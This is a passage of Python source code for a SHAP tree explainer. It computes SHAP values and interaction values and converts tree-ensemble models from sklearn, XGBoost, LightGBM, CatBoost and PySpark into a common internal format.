A matrix of samples (# samples x # features) on which to explain the model's output.
y : numpy.array
An array of label values for each sample. Used when explaining loss functions.
tree_limit : None (default) or int
Limit the number of trees used by the model. By default None means no use the limit of the
original model, and -1 means no limit.
approximate : bool
Run fast, but only roughly approximate the Tree SHAP values. This runs a method
previously proposed by Saabas which only considers a single feature ordering. Take care
since this does not have the consistency guarantees of Shapley values and places too
much weight on lower splits in the tree.
Returns
-------
For models with a single output this returns a matrix of SHAP values
(# samples x # features). Each row sums to the difference between the model output for that
sample and the expected value of the model output (which is stored in the expected_value
attribute of the explainer when it is constant). For models with vector outputs this returns
a list of such matrices, one for each output.
"""
# see if we have a default tree_limit in place.
if tree_limit is None:
tree_limit = -1 if self.model.tree_limit is None else self.model.tree_limit
# shortcut using the C++ version of Tree SHAP in XGBoost, LightGBM, and CatBoost
if self.feature_dependence == "tree_path_dependent" and self.model.model_type != "internal" and self.data is None:
phi = None
if self.model.model_type == "xgboost":
assert_import("xgboost")
if not str(type(X)).endswith("xgboost.core.DMatrix'>"):
X = xgboost.DMatrix(X)
if tree_limit == -1:
tree_limit = 0
phi = self.model.original_model.predict(
X, ntree_limit=tree_limit, pred_contribs=True,
approx_contribs=approximate, validate_features=False
)
elif self.model.model_type == "lightgbm":
assert not approximate, "approximate=True is not supported for LightGBM models!"
phi = self.model.original_model.predict(X, num_iteration=tree_limit, pred_contrib=True)
# Note: the data must be joined on the last axis
if self.model.original_model.params['objective'] == 'binary':
warnings.warn('LightGBM binary classifier with TreeExplainer shap values output has changed to a list of ndarray')
phi = np.concatenate((-phi, phi), axis=-1)
if phi.shape[1] != X.shape[1] + 1:
phi = phi.reshape(X.shape[0], phi.shape[1]//(X.shape[1]+1), X.shape[1]+1)
elif self.model.model_type == "catboost": # thanks to the CatBoost team for implementing this...
assert not approximate, "approximate=True is not supported for CatBoost models!"
assert tree_limit == -1, "tree_limit is not yet supported for CatBoost models!"
if type(X) != catboost.Pool:
X = catboost.Pool(X)
phi = self.model.original_model.get_feature_importance(data=X, fstr_type='ShapValues')
# note we pull off the last column and keep it as our expected_value
if phi is not None:
if len(phi.shape) == 3:
self.expected_value = [phi[0, i, -1] for i in range(phi.shape[1])]
return [phi[:, i, :-1] for i in range(phi.shape[1])]
else:
self.expected_value = phi[0, -1]
return phi[:, :-1]
# convert dataframes
orig_X = X
if str(type(X)).endswith("pandas.core.series.Series'>"):
X = X.values
elif str(type(X)).endswith("pandas.core.frame.DataFrame'>"):
X = X.values
flat_output = False
if len(X.shape) == 1:
flat_output = True
X = X.reshape(1, X.shape[0])
if X.dtype != self.model.dtype:
X = X.astype(self.model.dtype)
X_missing = np.isnan(X, dtype=np.bool)
assert str(type(X)).endswith("'numpy.ndarray'>"), "Unknown instance type: " + str(type(X))
assert len(X.shape) == 2, "Passed input data matrix X must have 1 or 2 dimensions!"
if tree_limit < 0 or tree_limit > self.model.values.shape[0]:
tree_limit = self.model.values.shape[0]
if self.model_output == "logloss":
assert y is not None, "Both samples and labels must be provided when explaining the loss (i.e. `explainer.shap_values(X, y)`)!"
assert X.shape[0] == len(y), "The number of labels (%d) does not match the number of samples to explain (%d)!" % (len(y), X.shape[0])
transform = self.model.get_transform(self.model_output)
if self.feature_dependence == "tree_path_dependent":
assert self.model.fully_defined_weighting, "The background dataset you provided does not cover all the leaves in the model, " \
"so TreeExplainer cannot run with the feature_dependence=\"tree_path_dependent\" option! " \
"Try providing a larger background dataset, or using feature_dependence=\"independent\"."
# run the core algorithm using the C extension
assert_import("cext")
phi = np.zeros((X.shape[0], X.shape[1]+1, self.model.n_outputs))
if not approximate:
_cext.dense_tree_shap(
self.model.children_left, self.model.children_right, self.model.children_default,
self.model.features, self.model.thresholds, self.model.values, self.model.node_sample_weight,
self.model.max_depth, X, X_missing, y, self.data, self.data_missing, tree_limit,
self.model.base_offset, phi, feature_dependence_codes[self.feature_dependence],
output_transform_codes[transform], False
)
else:
_cext.dense_tree_saabas(
self.model.children_left, self.model.children_right, self.model.children_default,
self.model.features, self.model.thresholds, self.model.values,
self.model.max_depth, tree_limit, self.model.base_offset, output_transform_codes[transform],
X, X_missing, y, phi
)
# note we pull off the last column and keep it as our expected_value
if self.model.n_outputs == 1:
if self.model_output != "logloss":
self.expected_value = phi[0, -1, 0]
if flat_output:
return phi[0, :-1, 0]
else:
return phi[:, :-1, 0]
else:
if self.model_output != "logloss":
self.expected_value = [phi[0, -1, i] for i in range(phi.shape[2])]
if flat_output:
return [phi[0, :-1, i] for i in range(self.model.n_outputs)]
else:
return [phi[:, :-1, i] for i in range(self.model.n_outputs)]
def shap_interaction_values(self, X, y=None, tree_limit=None):
""" Estimate the SHAP interaction values for a set of samples.
Parameters
----------
X : numpy.array, pandas.DataFrame or catboost.Pool (for catboost)
A matrix of samples (# samples x # features) on which to explain the model's output.
y : numpy.array
An array of label values for each sample. Used when explaining loss functions (not yet supported).
tree_limit : None (default) or int
Limit the number of trees used by the model. By default None means no use the limit of the
original model, and -1 means no limit.
Returns
-------
For models with a single output this returns a tensor of SHAP values
(# samples x # features x # features). The matrix (# features x # features) for each sample sums
to the difference between the model output for that sample and the expected value of the model output
(which is stored in the expected_value attribute of the explainer). Each row of this matrix sums to the
SHAP value for that feature for that sample. The diagonal entries of the matrix represent the
"main effect" of that feature on the prediction and the symmetric off-diagonal entries represent the
interaction effects between all pairs of features for that sample. For models with vector outputs
this returns a list of tensors, one for each output.
"""
assert self.model_output == "margin", "Only model_output = \"margin\" is supported for SHAP interaction values right now!"
assert self.feature_dependence == "tree_path_dependent", "Only feature_dependence = \"tree_path_dependent\" is supported for SHAP interaction values right now!"
transform = "identity"
# see if we have a default tree_limit in place.
if tree_limit is None:
tree_limit = -1 if self.model.tree_limit is None else self.model.tree_limit
# shortcut using the C++ version of Tree SHAP in XGBoost
if self.model.model_type == "xgboost":
assert_import("xgboost")
if not str(type(X)).endswith("xgboost.core.DMatrix'>"):
X = xgboost.DMatrix(X)
if tree_limit == -1:
tree_limit = 0
phi = self.model.original_model.predict(X, ntree_limit=tree_limit, pred_interactions=True)
# note we pull off the last column and keep it as our expected_value
if len(phi.shape) == 4:
self.expected_value = [phi[0, i, -1, -1] for i in range(phi.shape[1])]
return [phi[:, i, :-1, :-1] for i in range(phi.shape[1])]
else:
self.expected_value = phi[0, -1, -1]
return phi[:, :-1, :-1]
# convert dataframes
if str(type(X)).endswith("pandas.core.series.Series'>"):
X = X.values
elif str(type(X)).endswith("pandas.core.frame.DataFrame'>"):
X = X.values
flat_output = False
if len(X.shape) == 1:
flat_output = True
X = X.reshape(1, X.shape[0])
if X.dtype != self.model.dtype:
X = X.astype(self.model.dtype)
X_missing = np.isnan(X, dtype=np.bool)
assert str(type(X)).endswith("'numpy.ndarray'>"), "Unknown instance type: " + str(type(X))
assert len(X.shape) == 2, "Passed input data matrix X must have 1 or 2 dimensions!"
if tree_limit < 0 or tree_limit > self.model.values.shape[0]:
tree_limit = self.model.values.shape[0]
# run the core algorithm using the C extension
assert_import("cext")
phi = np.zeros((X.shape[0], X.shape[1]+1, X.shape[1]+1, self.model.n_outputs))
_cext.dense_tree_shap(
self.model.children_left, self.model.children_right, self.model.children_default,
self.model.features, self.model.thresholds, self.model.values, self.model.node_sample_weight,
self.model.max_depth, X, X_missing, y, self.data, self.data_missing, tree_limit,
self.model.base_offset, phi, feature_dependence_codes[self.feature_dependence],
output_transform_codes[transform], True
)
# note we pull off the last column and keep it as our expected_value
if self.model.n_outputs == 1:
self.expected_value = phi[0, -1, -1, 0]
if flat_output:
return phi[0, :-1, :-1, 0]
else:
return phi[:, :-1, :-1, 0]
else:
self.expected_value = [phi[0, -1, -1, i] for i in range(phi.shape[3])]
if flat_output:
return [phi[0, :-1, :-1, i] for i in range(self.model.n_outputs)]
else:
return [phi[:, :-1, :-1, i] for i in range(self.model.n_outputs)]
class TreeEnsemble:
""" An ensemble of decision trees.
This object provides a common interface to many different types of models.
"""
def __init__(self, model, data=None, data_missing=None):
self.model_type = "internal"
self.trees = None
less_than_or_equal = True
self.base_offset = 0
self.objective = None # what we explain when explaining the loss of the model
self.tree_output = None # what are the units of the values in the leaves of the trees
self.dtype = np.float64 # for sklearn we need to use np.float32 to always get exact matches to their predictions
self.data = data
self.data_missing = data_missing
self.fully_defined_weighting = True # does the background dataset land in every leaf (making it valid for the tree_path_dependent method)
self.tree_limit = None # used for limiting the number of trees we use by default (like from early stopping)
# we use names like keras
objective_name_map = {
"mse": "squared_error",
"friedman_mse": "squared_error",
"reg:linear": "squared_error",
"regression": "squared_error",
"regression_l2": "squared_error",
"mae": "absolute_error",
"gini": "binary_crossentropy",
"entropy": "binary_crossentropy",
"binary:logistic": "binary_crossentropy",
"binary_logloss": "binary_crossentropy",
"binary": "binary_crossentropy"
}
tree_output_name_map = {
"regression": "raw_value",
"regression_l2": "squared_error",
"reg:linear": "raw_value",
"binary:logistic": "log_odds",
"binary_logloss": "log_odds",
"binary": "log_odds"
}
if type(model) == list and type(model[0]) == Tree:
self.trees = model
elif str(type(model)).endswith("sklearn.ensemble.forest.RandomForestRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("skopt.learning.forest.RandomForestRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.ensemble.forest.ExtraTreesRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("skopt.learning.forest.ExtraTreesRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.tree.tree.DecisionTreeRegressor'>"):
self.dtype = np.float32
self.trees = [Tree(model.tree_, data=data, data_missing=data_missing)]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.tree.tree.DecisionTreeClassifier'>"):
self.dtype = np.float32
self.trees = [Tree(model.tree_, normalize=True, data=data, data_missing=data_missing)]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
elif str(type(model)).endswith("sklearn.ensemble.forest.RandomForestClassifier'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, normalize=True, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
elif str(type(model)).endswith("sklearn.ensemble.forest.ExtraTreesClassifier'>"): # TODO: add unit test for this case
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, normalize=True, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
elif str(type(model)).endswith("sklearn.ensemble.gradient_boosting.GradientBoostingRegressor'>"):
self.dtype = np.float32
# currently we only support the mean and quantile estimators
if str(type(model.init_)).endswith("ensemble.gradient_boosting.MeanEstimator'>"):
self.base_offset = model.init_.mean
elif str(type(model.init_)).endswith("ensemble.gradient_boosting.QuantileEstimator'>"):
self.base_offset = model.init_.quantile
elif str(type(model.init_)).endswith("sklearn.dummy.DummyRegressor'>"):
self.base_offset = model.init_.constant_[0]
else:
assert False, "Unsupported init model type: " + str(type(model.init_))
self.trees = [Tree(e.tree_, scaling=model.learning_rate, data=data, data_missing=data_missing) for e in model.estimators_[:,0]]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.ensemble.gradient_boosting.GradientBoostingClassifier'>"):
self.dtype = np.float32
# TODO: deal with estimators for each class
if model.estimators_.shape[1] > 1:
assert False, "GradientBoostingClassifier is only supported for binary classification right now!"
# currently we only support the logs odds estimator
if str(type(model.init_)).endswith("ensemble.gradient_boosting.LogOddsEstimator'>"):
self.base_offset = model.init_.prior
self.tree_output = "log_odds"
elif str(type(model.init_)).endswith("sklearn.dummy.DummyClassifier'>"):
self.base_offset = scipy.special.logit(model.init_.class_prior_[1]) # with two classes the trees only model the second class
self.tree_output = "log_odds"
else:
assert False, "Unsupported init model type: " + str(type(model.init_))
self.trees = [Tree(e.tree_, scaling=model.learning_rate, data=data, data_missing=data_missing) for e in model.estimators_[:,0]]
self.objective = objective_name_map.get(model.criterion, None)
elif str(type(model)).endswith("pyspark.ml.classification.RandomForestClassificationModel'>") \
or str(type(model)).endswith("pyspark.ml.classification.GBTClassificationModel'>"):
assert_import("pyspark")
self.original_model = model
self.model_type = "pyspark"
self.trees = [Tree(tree, scaling=model.treeWeights[i]) for i, tree in enumerate(model.trees)]
if model._java_obj.getImpurity() == 'variance':
assert False, "Unsupported objective: variance"
self.objective = objective_name_map.get(model._java_obj.getImpurity(), None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("pyspark.ml.classification.DecisionTreeClassificationModel'>"):
assert_import("pyspark")
self.original_model = model
self.model_type = "pyspark"
self.trees = [Tree(model, scaling=1)]
#model._java_obj.getImpurity() can be gini, entropy or variance.
if model._java_obj.getImpurity() == 'variance':
#TODO handle variance as loss?
assert False, "Unsupported objective: variance"
self.objective = objective_name_map.get(model._java_obj.getImpurity(), None)
#TODO base_offset?
self.tree_output = "raw_value"
elif str(type(model)).endswith("xgboost.core.Booster'>"):
assert_import("xgboost")
self.original_model = model
self.model_type = "xgboost"
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
self.objective = objective_name_map.get(xgb_loader.name_obj, None)
self.tree_output = tree_output_name_map.get(xgb_loader.name_obj, None)
elif str(type(model)).endswith("xgboost.sklearn.XGBClassifier'>"):
assert_import("xgboost")
self.dtype = np.float32
self.model_type = "xgboost"
self.original_model = model.get_booster()
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
self.objective = objective_name_map.get(xgb_loader.name_obj, None)
self.tree_output = tree_output_name_map.get(xgb_loader.name_obj, None)
self.tree_limit = getattr(model, "best_ntree_limit", None)
elif str(type(model)).endswith("xgboost.sklearn.XGBRegressor'>"):
assert_import("xgboost")
self.original_model = model.get_booster()
self.model_type = "xgboost"
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
self.objective = objective_name_map.get(xgb_loader.name_obj, None)
self.tree_output = tree_output_name_map.get(xgb_loader.name_obj, None)
self.tree_limit = getattr(model, "best_ntree_limit", None)
elif str(type(model)).endswith("xgboost.sklearn.XGBRanker'>"):
assert_import("xgboost")
self.original_model = model.get_booster()
self.model_type = "xgboost"
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
# Note: for ranker, leaving tree_output and objective as None as they
# are not implemented in native code yet
self.tree_limit = getattr(model, "best_ntree_limit", None)
elif str(type(model)).endswith("lightgbm.basic.Booster'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except:
self.trees = None # we get here because the cext can't handle categorical splits yet
self.objective = objective_name_map.get(model.params.get("objective", "regression"), None)
self.tree_output = tree_output_name_map.get(model.params.get("objective", "regression"), None)
elif str(type(model)).endswith("lightgbm.sklearn.LGBMRegressor'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model.booster_
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except:
self.trees = None # we get here because the cext can't handle categorical splits yet
self.objective = objective_name_map.get(model.objective, None)
self.tree_output = tree_output_name_map.get(model.objective, None)
if model.objective is None:
self.objective = "squared_error"
self.tree_output = "raw_value"
elif str(type(model)).endswith("lightgbm.sklearn.LGBMRanker'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model.booster_
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except:
self.trees = None # we get here because the cext can't handle categorical splits yet
# Note: for ranker, leaving tree_output and objective as None as they
# are not implemented in native code yet
elif str(type(model)).endswith("lightgbm.sklearn.LGBMClassifier'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model.booster_
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except:
self.trees = None # we get here because the cext can't handle categorical splits yet
self.objective = objective_name_map.get(model.objective, None)
self.tree_output = tree_output_name_map.get(model.objective, None)
if model.objective is None:
self.objective = "binary_crossentropy"
self.tree_output = "log_odds"
elif str(type(model)).endswith("catboost.core.CatBoostRegressor'>"):
assert_import("catboost")
self.model_type = "catboost"
self.original_model = model
elif str(type(model)).endswith("catboost.core.CatBoostClassifier'>"):
assert_import("catboost")
self.model_type = "catboost"
self.original_model = model
self.dtype = np.float32
cb_loader = CatBoostTreeModelLoader(model)
self.trees = cb_loader.get_trees(data=data, data_missing=data_missing)
self.tree_output = "log_odds"
self.objective = "binary_crossentropy"
elif str(type(model)).endswith("catboost.core.CatBoost'>"):
assert_import("catboost")
self.model_type = "catboost"
self.original_model = model
elif str(type(model)).endswith("imblearn.ensemble._forest.BalancedRandomForestClassifier'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, normalize=True, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
else:
raise Exception("Model type not yet supported by TreeExplainer: " + str(type(model)))
# build a dense numpy version of all the tree objects
if self.trees is not None and self.trees:
max_nodes = np.max([len(t.values) for t in self.trees])
assert len(np.unique([t.values.shape[1] for t in self.trees])) == 1, "All trees in the ensemble must have the same output dimension!"
ntrees = len(self.trees)
self.n_outputs = self.trees[0].values.shape[1]
# important to be -1 in unused sections!! This way we can tell which entries are valid.
self.children_left = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.children_right = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.children_default = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.features = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.thresholds = np.zeros((ntrees, max_nodes), dtype=self.dtype)
self.values = np.zeros((ntrees, max_nodes, self.trees[0].values.shape[1]), dtype=self.dtype)
self.node_sample_weight = np.zeros((ntrees, max_nodes), dtype=self.dtype)
for i in range(ntrees):
l = len(self.trees[i].features)
self.children_left[i,:l] = self.trees[i].children_left
self.children_right[i,:l] = self.trees[i].children_right
self.children_default[i,:l] = self.trees[i].children_default
self.features[i,:l] = self.trees[i].features
self.thresholds[i,:l] = self.trees[i].thresholds
self.values[i,:l,:] = self.trees[i].values
self.node_sample_weight[i,:l] = self.trees[i].node_sample_weight
# ensure that the passed background dataset lands in every leaf
if np.min(self.trees[i].node_sample_weight) <= 0:
self.fully_defined_weighting = False
# If we should do <= then we nudge the thresholds to make our <= work like <
if not less_than_or_equal:
self.thresholds = np.nextafter(self.thresholds, -np.inf)
self.num_nodes = np.array([len(t.values) for t in self.trees], dtype=np.int32)
self.max_depth = np.max([t.max_depth for t in self.trees])
def get_transform(self, model_output):
""" A consistent interface to make predictions from this model.
"""
if model_output == "margin":
transform = "identity"
elif model_output == "probability":
if self.tree_output == "log_odds":
transform = "logistic"
elif self.tree_output == "probability":
transform = "identity"
else:
raise Exception("model_output = \"probability\" is not yet supported when model.tree_output = \"" + self.tree_output + "\"!")
elif model_output == "logloss":
if self.objective == "squared_error":
transform = "squared_loss"
elif self.objective == "binary_crossentropy":
transform = "logistic_nlogloss"
else:
raise Exception("model_output = \"logloss\" is not yet supported when model.objective = \"" + self.objective + "\"!")
return transform
def predict(self, X, y=None, output="margin", tree_limit=None):
""" A consistent interface to make predictions from this model.
Parameters
----------
tree_limit : None (default) or int
Limit the number of trees used by the model. By default None means no use the limit of the
original model, and -1 means no limit.
"""
if self.model_type == "pyspark":
assert_import("pyspark")
#TODO support predict for pyspark
raise NotImplementedError("Predict with pyspark isn't implemented")
# see if we have a default tree_limit in place.
if tree_limit is None:
tree_limit = -1 if self.tree_limit is None else self.tree_limit
# convert dataframes
if str(type(X)).endswith("pandas.core.series.Series'>"):
X = X.values
elif str(type(X)).endswith("pandas.core.frame.DataFrame'>"):
X = X.values
flat_output = False
if len(X.shape) == 1:
flat_output = True
X = X.reshape(1, X.shape[0])
if X.dtype != self.dtype:
X = X.astype(self.dtype)
X_missing = np.isnan(X, dtype=np.bool)
assert str(type(X)).endswith("'numpy.ndarray'>"), "Unknown instance type: " + str(type(X))
assert len(X.shape) == 2, "Passed input data matrix X must have 1 or 2 dimensions!"
if tree_limit < 0 or tree_limit > self.values.shape[0]:
tree_limit = self.values.shape[0]
if output == "logloss":
assert y is not None, "Both samples and labels must be provided when explaining the loss (i.e. `explainer.shap_values(X, y)`)!"
assert X.shape[0] == len(y), "The number of labels (%d) does not match the number of samples to explain (%d)!" % (len(y), X.shape[0])
transform = self.get_transform(output)
if True or self.model_type == "internal":
output = np.zeros((X.shape[0], self.n_outputs))
assert_import("cext")
_cext.dense_tree_predict(
self.children_left, self.children_right, self.children_default,
self.features, self.thresholds, self.values,
self.max_depth, tree_limit, self.base_offset, output_transform_codes[transform],
X, X_missing, y, output
)
elif self.model_type == "xgboost":
assert_import("xgboost")
output = self.original_model.predict(X, output_margin=True, tree_limit=tree_limit)
# drop dimensions we don't need
if flat_output:
if self.n_outputs == 1:
return output.flatten()[0]
else:
return output.reshape(-1, self.n_outputs)
else:
if self.n_outputs == 1:
return output.flatten()
else:
return output
class Tree:
""" A single decision tree.
The primary point of this object is to parse many different tree types into a common format.
"""
def __init__(self, tree, normalize=False, scaling=1.0, data=None, data_missing=None):
assert_import("cext")
if str(type(tree)).endswith("'sklearn.tree._tree.Tree'>"):
self.children_left = tree.children_left.astype(np.int32)
self.children_right = tree.children_right.astype(np.int32)
self.children_default = self.children_left # missing values not supported in sklearn
self.features = tree.feature.astype(np.int32)
self.thresholds = tree.threshold.astype(np.float64)
self.values = tree.value.reshape(tree.value.shape[0], tree.value.shape[1] * tree.value.shape[2])
if normalize:
self.values = (self.values.T / self.values.sum(1)).T
self.values = self.values * scaling
self.node_sample_weight = tree.weighted_n_node_samples.astype(np.float64)
elif type(tree) == dict and 'children_left' in tree:
self.children_left = tree["children_left"].astype(np.int32)
self.children_right = tree["children_right"].astype(np.int32)
self.children_default = tree["children_default"].astype(np.int32)
self.features = tree["feature"].astype(np.int32)
self.thresholds = tree["threshold"]
self.values = tree["value"] * scaling
self.node_sample_weight = tree["node_sample_weight"]
elif str(type(tree)).endswith("pyspark.ml.classification.DecisionTreeClassificationModel'>"):
#model._java_obj.numNodes() doesn't give leaves, need to recompute the size
def getNumNodes(node, size):
size = size + 1
if node.subtreeDepth() == 0:
return size
else:
size = getNumNodes(node.leftChild(), size)
return getNumNodes(node.rightChild(), size)
num_nodes = getNumNodes(tree._java_obj.rootNode(), 0)
self.children_left = np.full(num_nodes, -2, dtype=np.int32)
self.children_right = np.full(num_nodes, -2, dtype=np.int32)
self.children_default = np.full(num_nodes, -2, dtype=np.int32)
self.features = np.full(num_nodes, -2, dtype=np.int32)
self.thresholds = np.full(num_nodes, -2, dtype=np.float64)
self.values = [-2]*num_nodes
self.node_sample_weight = np.full(num_nodes, -2, dtype=np.float64)
def buildTree(index, node):
index = index + 1
self.values[index] = [e for e in node.impurityStats().stats()] #NDarray(numLabel): 1 per label: number of item for each label which went through this node
self.node_sample_weight[index] = node.impurityStats().count() #weighted count of element trough this node
if node.subtreeDepth() == 0:
return index
else:
self.features[index] = node.split().featureIndex() #index of the feature we split on, not available for leaf, int
if str(node.split().getClass()).endswith('tree.CategoricalSplit'):
#Categorical split isn't implemented, TODO: could fake it by creating a fake node to split on the exact value?
raise NotImplementedError('CategoricalSplit are not yet implemented')
self.thresholds[index] = node.split().threshold() #threshold for the feature, not available for leaf, float
self.children_left[index] = index + 1
idx = buildTree(index, node.leftChild())
self.children_right[index] = idx + 1
idx = buildTree(idx, node.rightChild())
return idx
buildTree(-1, tree._java_obj.rootNode())
#default Not supported with mlib? (TODO)
self.children_default = self.children_left
self.values = np.asarray(self.values)
self.values = self.values * scaling
elif type(tree) == dict and 'tree_structure' in tree:
start = tree['tree_structure']
num_parents = tree['num_leaves']-1
self.children_left = np.empty((2*num_parents+1), dtype=np.int32)
self.children_right = np.empty((2*num_parents+1), dtype=np.int32)
self.children_default = np.empty((2*num_parents+1), dtype=np.int32)
self.features = np.empty((2*num_parents+1), dtype=np.int32)
self.thresholds = np.empty((2*num_parents+1), dtype=np.float64)
self.values = [-2]*(2*num_parents+1)
self.node_sample_weight = np.empty((2*num_parents+1), dtype=np.float64)
visited, queue = [], [start]
while queue:
vertex = queue.pop(0)
if 'split_index' in vertex.keys():
if vertex['split_index'] not in visited:
if 'split_index' in vertex['left_child'].keys():
self.children_left[vertex['split_index']] = vertex['left_child']['split_index']
else:
self.children_left[vertex['split_index']] = vertex['left_child']['leaf_index']+num_parents
if 'split_index' in vertex['right_child'].keys():
self.children_right[vertex['split_index']] = vertex['right_child']['split_index']
else:
self.children_right[vertex['split_index']] = vertex['right_child']['leaf_index']+num_parents
if vertex['default_left']:
self.children_default[vertex['split_index']] = self.children_left[vertex['split_index']]
else:
self.children_default[vertex['split_index']] = self.children_right[vertex['split_index']]
self.features[vertex['split_index']] = vertex['split_feature']
self.thresholds[vertex['split_index']] = vertex['threshold']
self.values[vertex['split_index']] = [vertex['internal_value']]
self.node_sample_weight[vertex['split_index']] = vertex['internal_count']
visited.append(vertex['split_index'])
queue.append(vertex['left_child'])
queue.append(vertex['right_child'])
else:
self.children_left[vertex['leaf_index']+num_parents] = -1
self.children_right[vertex['leaf_index']+num_parents] = -1
self.children_default[vertex['leaf_index']+num_parents] = -1
self.features[vertex['leaf_index']+num_parents] = -1
self.children_left[vertex['leaf_index']+num_parents] = -1
self.children_right[vertex['leaf_index']+num_parents] = -1
self.children_default[vertex['leaf_index']+num_parents] = -1
self.features[vertex['leaf_index']+num_parents] = -1
self.thresholds[vertex['leaf_index']+num_parents] = -1
self.values[vertex['leaf_index']+num_parents] = [vertex['leaf_value']]
self.node_sample_weight[vertex['leaf_index']+num_parents] = vertex['leaf_count']
self.values = np.asarray(self.values)
self.values = np.multiply(self.values, scaling)
elif type(tree) == dict and 'nodeid' in tree:
""" Directly create tree given the JSON dump (with stats) of a XGBoost model.
"""
def max_id(node):
if "children" in node:
return max(node["nodeid"], *[max_id(n) for n in node["children"]])
else:
return node["nodeid"]
m = max_id(tree) + 1
self.children_left = -np.ones(m, dtype=np.int32)
self.children_right = -np.ones(m, dtype=np.int32)
self.children_default = -np.ones(m, dtype=np.int32)
self.features = -np.ones(m, dtype=np.int32)
self.thresholds = np.zeros(m, dtype=np.float64)
self.values = np.zeros((m, 1), dtype=np.float64)
self.node_sample_weight = np.empty(m, dtype=np.float64)
def extract_data(node, tree):
i = node["nodeid"]
tree.node_sample_weight[i] = node["cover"]
if "children" in node:
tree.children_left[i] = node["yes"]
tree.children_right[i] = node["no"]
tree.children_default[i] = node["missing"]
tree.features[i] = node["split"]
tree.thresholds[i] = node["split_condition"]
for n in node["children"]:
extract_data(n, tree)
elif "leaf" in node:
tree.values[i] = node["leaf"] * scaling
extract_data(tree, self)
elif type(tree) == str:
""" Build a tree from a text dump (with stats) of xgboost.
"""
nodes = [t.lstrip() for t in tree[:-1].split("\n")]
nodes_dict = {}
for n in nodes: nodes_dict[int(n.split(":")[0])] = n.split(":")[1]
m = max(nodes_dict.keys())+1
children_left = -1*np.ones(m,dtype="int32")
children_right = -1*np.ones(m,dtype="int32")
children_default = -1*np.ones(m,dtype="int32")
features = -2*np.ones(m,dtype="int32")
thresholds = -1*np.ones(m,dtype="float64")
values = 1*np.ones(m,dtype="float64")
node_sample_weight = np.zeros(m,dtype="float64")
values_lst = list(nodes_dict.values())
keys_lst = list(nodes_dict.keys())
for i in range(0,len(keys_lst)):
value = values_lst[i]
key = keys_lst[i]
if ("leaf" in value):
# Extract values
val = float(value.split("leaf=")[1].split(",")[0])
node_sample_weight_val = float(value.split("cover=")[1])
# Append to lists
values[key] = val
node_sample_weight[key] = node_sample_weight_val
else:
c_left = int(value.split("yes=")[1].split(",")[0])
c_right = int(value.split("no=")[1].split(",")[0])
c_default = int(value.split("missing=")[1].split(",")[0])
feat_thres = value.split(" ")[0]
if ("<" in feat_thres):
feature = int(feat_thres.split("<")[0][2:])
threshold = float(feat_thres.split("<")[1][:-1])
if ("=" in feat_thres):
feature = int(feat_thres.split("=")[0][2:])
threshold = float(feat_thres.split("=")[1][:-1])
